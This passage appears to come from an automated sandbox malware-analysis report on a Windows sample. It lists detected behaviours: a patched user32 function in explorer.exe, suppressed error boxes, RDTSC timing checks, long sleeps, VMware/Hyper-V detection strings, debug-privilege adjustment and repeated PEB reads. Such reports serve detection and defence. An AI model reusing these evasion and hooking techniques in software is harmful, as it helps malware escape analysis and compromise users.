          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041D56C push eax; ret 3_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041D502 push eax; ret 3_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041D50B push eax; ret 3_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041762E push eax; ret 3_2_00417633
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00416704 push F2D26E43h; iretd 3_2_0041675E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0105D0D1 push ecx; ret 3_2_0105D0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.5788906126167275

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000C39904 second address: 0000000000C3990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 0000000000C39B7E second address: 0000000000C39B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe TID: 1352Thread sleep time: -44034s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe TID: 1380Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exe TID: 2056Thread sleep time: -46000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 882Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 859Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 6.5 %
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeThread delayed: delay time: 44034Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000002.578041810.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000003.538828140.000000000F083000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW=]
          Source: explorer.exe, 00000004.00000002.584991570.000000000F03A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.559962934.000000000F039000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
          Source: explorer.exe, 00000004.00000000.356549473.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000004.00000000.356549473.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.570208987.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.356549473.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000002.578041810.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01009100 mov eax, dword ptr fs:[00000030h]3_2_01009100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01009100 mov eax, dword ptr fs:[00000030h]3_2_01009100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01009100 mov eax, dword ptr fs:[00000030h]3_2_01009100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01024120 mov eax, dword ptr fs:[00000030h]3_2_01024120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01024120 mov eax, dword ptr fs:[00000030h]3_2_01024120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01024120 mov eax, dword ptr fs:[00000030h]3_2_01024120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01024120 mov eax, dword ptr fs:[00000030h]3_2_01024120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01024120 mov ecx, dword ptr fs:[00000030h]3_2_01024120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103513A mov eax, dword ptr fs:[00000030h]3_2_0103513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103513A mov eax, dword ptr fs:[00000030h]3_2_0103513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102B944 mov eax, dword ptr fs:[00000030h]3_2_0102B944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102B944 mov eax, dword ptr fs:[00000030h]3_2_0102B944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100C962 mov eax, dword ptr fs:[00000030h]3_2_0100C962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100B171 mov eax, dword ptr fs:[00000030h]3_2_0100B171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100B171 mov eax, dword ptr fs:[00000030h]3_2_0100B171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102C182 mov eax, dword ptr fs:[00000030h]3_2_0102C182
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103A185 mov eax, dword ptr fs:[00000030h]3_2_0103A185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01032990 mov eax, dword ptr fs:[00000030h]3_2_01032990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010361A0 mov eax, dword ptr fs:[00000030h]3_2_010361A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010361A0 mov eax, dword ptr fs:[00000030h]3_2_010361A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C49A4 mov eax, dword ptr fs:[00000030h]3_2_010C49A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C49A4 mov eax, dword ptr fs:[00000030h]3_2_010C49A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C49A4 mov eax, dword ptr fs:[00000030h]3_2_010C49A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C49A4 mov eax, dword ptr fs:[00000030h]3_2_010C49A4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010869A6 mov eax, dword ptr fs:[00000030h]3_2_010869A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010851BE mov eax, dword ptr fs:[00000030h]3_2_010851BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010851BE mov eax, dword ptr fs:[00000030h]3_2_010851BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010851BE mov eax, dword ptr fs:[00000030h]3_2_010851BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010851BE mov eax, dword ptr fs:[00000030h]3_2_010851BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010299BF mov ecx, dword ptr fs:[00000030h]3_2_010299BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010299BF mov ecx, dword ptr fs:[00000030h]3_2_010299BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010299BF mov eax, dword ptr fs:[00000030h]3_2_010299BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010299BF mov ecx, dword ptr fs:[00000030h]3_2_010299BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010299BF mov ecx, dword ptr fs:[00000030h]3_2_010299BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010299BF mov eax, dword ptr fs:[00000030h]3_2_010299BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010299BF mov ecx, dword ptr fs:[00000030h]3_2_010299BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010299BF mov ecx, dword ptr fs:[00000030h]3_2_010299BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010299BF mov eax, dword ptr fs:[00000030h]3_2_010299BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010299BF mov ecx, dword ptr fs:[00000030h]3_2_010299BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010299BF mov ecx, dword ptr fs:[00000030h]3_2_010299BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010299BF mov eax, dword ptr fs:[00000030h]3_2_010299BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100B1E1 mov eax, dword ptr fs:[00000030h]3_2_0100B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100B1E1 mov eax, dword ptr fs:[00000030h]3_2_0100B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100B1E1 mov eax, dword ptr fs:[00000030h]3_2_0100B1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010941E8 mov eax, dword ptr fs:[00000030h]3_2_010941E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D4015 mov eax, dword ptr fs:[00000030h]3_2_010D4015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D4015 mov eax, dword ptr fs:[00000030h]3_2_010D4015
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01087016 mov eax, dword ptr fs:[00000030h]3_2_01087016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01087016 mov eax, dword ptr fs:[00000030h]3_2_01087016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01087016 mov eax, dword ptr fs:[00000030h]3_2_01087016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101B02A mov eax, dword ptr fs:[00000030h]3_2_0101B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101B02A mov eax, dword ptr fs:[00000030h]3_2_0101B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101B02A mov eax, dword ptr fs:[00000030h]3_2_0101B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101B02A mov eax, dword ptr fs:[00000030h]3_2_0101B02A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103002D mov eax, dword ptr fs:[00000030h]3_2_0103002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103002D mov eax, dword ptr fs:[00000030h]3_2_0103002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103002D mov eax, dword ptr fs:[00000030h]3_2_0103002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103002D mov eax, dword ptr fs:[00000030h]3_2_0103002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103002D mov eax, dword ptr fs:[00000030h]3_2_0103002D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A830 mov eax, dword ptr fs:[00000030h]3_2_0102A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A830 mov eax, dword ptr fs:[00000030h]3_2_0102A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A830 mov eax, dword ptr fs:[00000030h]3_2_0102A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A830 mov eax, dword ptr fs:[00000030h]3_2_0102A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01020050 mov eax, dword ptr fs:[00000030h]3_2_01020050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01020050 mov eax, dword ptr fs:[00000030h]3_2_01020050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D1074 mov eax, dword ptr fs:[00000030h]3_2_010D1074
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2073 mov eax, dword ptr fs:[00000030h]3_2_010C2073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01009080 mov eax, dword ptr fs:[00000030h]3_2_01009080
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01083884 mov eax, dword ptr fs:[00000030h]3_2_01083884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01083884 mov eax, dword ptr fs:[00000030h]3_2_01083884
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010320A0 mov eax, dword ptr fs:[00000030h]3_2_010320A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010320A0 mov eax, dword ptr fs:[00000030h]3_2_010320A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010320A0 mov eax, dword ptr fs:[00000030h]3_2_010320A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010320A0 mov eax, dword ptr fs:[00000030h]3_2_010320A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010320A0 mov eax, dword ptr fs:[00000030h]3_2_010320A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010320A0 mov eax, dword ptr fs:[00000030h]3_2_010320A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010490AF mov eax, dword ptr fs:[00000030h]3_2_010490AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103F0BF mov ecx, dword ptr fs:[00000030h]3_2_0103F0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103F0BF mov eax, dword ptr fs:[00000030h]3_2_0103F0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103F0BF mov eax, dword ptr fs:[00000030h]3_2_0103F0BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109B8D0 mov eax, dword ptr fs:[00000030h]3_2_0109B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109B8D0 mov ecx, dword ptr fs:[00000030h]3_2_0109B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109B8D0 mov eax, dword ptr fs:[00000030h]3_2_0109B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109B8D0 mov eax, dword ptr fs:[00000030h]3_2_0109B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109B8D0 mov eax, dword ptr fs:[00000030h]3_2_0109B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0109B8D0 mov eax, dword ptr fs:[00000030h]3_2_0109B8D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010040E1 mov eax, dword ptr fs:[00000030h]3_2_010040E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010040E1 mov eax, dword ptr fs:[00000030h]3_2_010040E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010040E1 mov eax, dword ptr fs:[00000030h]3_2_010040E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102B8E4 mov eax, dword ptr fs:[00000030h]3_2_0102B8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102B8E4 mov eax, dword ptr fs:[00000030h]3_2_0102B8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010058EC mov eax, dword ptr fs:[00000030h]3_2_010058EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A309 mov eax, dword ptr fs:[00000030h]3_2_0102A309
